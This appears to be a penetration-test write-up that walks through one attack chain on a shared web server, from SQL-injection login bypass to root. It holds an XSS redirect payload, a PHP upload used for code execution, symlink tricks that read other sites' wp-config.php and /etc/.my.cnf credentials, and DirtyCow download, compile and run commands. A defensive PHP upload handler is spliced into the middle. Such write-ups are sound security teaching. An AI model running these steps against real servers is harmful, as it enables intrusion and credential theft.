A cocktail of Vulnerabilities

A journey from bypassing a login panel to getting r00t level access on a server, with potential business takeover

Classic SQLi to bypass authentication mechanism
Portal view with User Management Module
Create User function exhibiting 3 different roles
XSS Payload to redirect to csrf page: <script>window.location('http://vulnerabilities.in/Surprise');</script>
<iframe src="/csrf.html" width=0 height=0>
Profile page with image upload functionality
<?php echo phpinfo();?>
RCE — phpinfo() method execution on target server
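The upload flaw above (a profile image field accepting a raw PHP file that the web server then executes) is the step a defender would close first. As an added example that is not code from the original post or the assessed application, here is a hardened PHP upload handler; the form field name `avatar`, the constant `UPLOAD_DIR` and the function `store_avatar` are assumptions.

```php
<?php
// Hardened profile-image upload handler (added example, not the target
// application's code). Assumes a form field "avatar" and an upload
// directory outside the web root (UPLOAD_DIR); both are assumptions.
const UPLOAD_DIR = '/var/app/uploads';   // not under public_html
const MAX_BYTES  = 2 * 1024 * 1024;      // 2 MiB

function store_avatar(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Never trust the client-supplied filename or MIME type; sniff the bytes.
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $mime    = $finfo->file($file['tmp_name']);
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg'];
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('not an allowed image type');
    }
    // Re-encode through GD: a file that is really "<?php ... ?>" behind a
    // forged header fails to decode, and trailing payload bytes are dropped.
    $img = $mime === 'image/png'
        ? @imagecreatefrompng($file['tmp_name'])
        : @imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('image could not be decoded');
    }
    // Server-chosen random name with a fixed extension: no .php/.phtml and
    // no path components from the client can reach the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    $ok   = $mime === 'image/png' ? imagepng($img, $dest) : imagejpeg($img, $dest, 85);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    chmod($dest, 0644);
    return $name; // serve through a read-only handler, never as a PHP script
}

// Usage in request context:
// $stored = store_avatar($_FILES['avatar']);
```

Storing outside the web root matters even with the checks: if a file can only ever be read back through a handler that sets an image Content-Type, a bypass of the type check still cannot reach the PHP interpreter.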
1. /etc/valiases
<?php
$dir = '/etc/valiases';
$files = scandir($dir);
Email forwarders are set here, which reveals domain name aliases.
2. /etc/named.conf
preg_match_all("#named/(.*?).db#", $file, $r);
// Contains 2 entries, internal & external
$domains = array_unique($r[1]);
Consists of zone entries for all the domains on that server.
3. http://viewdns.info/reverseip/?host=domain.com
ln -s /home/target/public_html/includes/config.php symlink.txt
ln -s / symroot
ln -s /home/example/public_html/domain1/wp-config.php symlink1.txt
ln -s /home/example/public_html/domain2/blogs/wp-config.php symlink2.txt
ln -s /home/example/public_html/domain3/boxedlayout/wp-config.php symlink3.txt
WordPress configuration file revealing database credentials
Username: Ciph3r00t
Password: MD5Hash(password)=> 5f4dcc3b5aa765d61d8327deb882cf99
Network interfaces configuration
cat /etc/.my.cnf
Dedicated domain control panel access
Reseller domain control panel access
THN Tweet on 21st Oct 2016 about DirtyCow Exploit
Download: curl https://github.com/FireFart/dirtycow/blob/master/dirty.c
Compilation: gcc -pthread dirty.c -o dirty -lcrypt
Execution: chmod +x dirty
./dirty
su firefart
Downloading, compiling and executing exploit on target server
Escalating to, and switching to, the firefart user with r00t privileges created by the DirtyCow exploit
Snap from the Assessment Report

Keep training and keep learning until you get it Right.